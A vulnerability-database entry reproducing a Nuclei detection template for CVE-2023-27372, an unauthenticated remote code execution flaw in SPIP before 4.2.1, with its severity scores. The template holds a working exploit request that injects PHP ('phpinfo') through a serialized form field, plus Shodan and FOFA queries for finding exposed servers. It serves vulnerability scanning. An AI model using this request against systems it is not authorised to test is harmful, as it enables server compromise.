SPIP - Remote Command Execution

2023-06-2120:52:22

ProjectDiscovery

github.com

spip

remote command execution

code execution

serialization

rce

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON

SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.

id: CVE-2023-27372

info:
  name: SPIP - Remote Command Execution
  author: DhiyaneshDK,nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of SPIP.
  reference:
    - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
    - https://github.com/nuts7/CVE-2023-27372
    - http://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - http://packetstormsecurity.com/files/173044/SPIP-4.2.1-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27372
    epss-score: 0.97376
    epss-percentile: 0.99905
    cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: spip
    product: spip
    shodan-query:
      - html:"spip.php?page=backend"
      - http.html:"spip.php?page=backend"
      - cpe:"cpe:2.3:a:spip:spip"
    fofa-query: body="spip.php?page=backend"
  tags: cve,cve2023,packetstorm,spip,rce

http:
  - raw:
      - |
        GET /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "PHP Extension"
          - "PHP Version"
          - "<!DOCTYPE html"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - "name='formulaire_action_args'[^>]*value='([^']*)'"
        internal: true
        part: body_1

      - type: regex
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
        part: body_2
# digest: 4b0a00483046022100d0c77ced102f6fb0687d4c015f0f3ca2d3e3850b68086b7172d1c7cb98c560c1022100f6f66aa67252c9894fb140aebd529e4938a5db1d320ef9110323e846d0022ac8:922c64590222798bb761d5b6d8e72950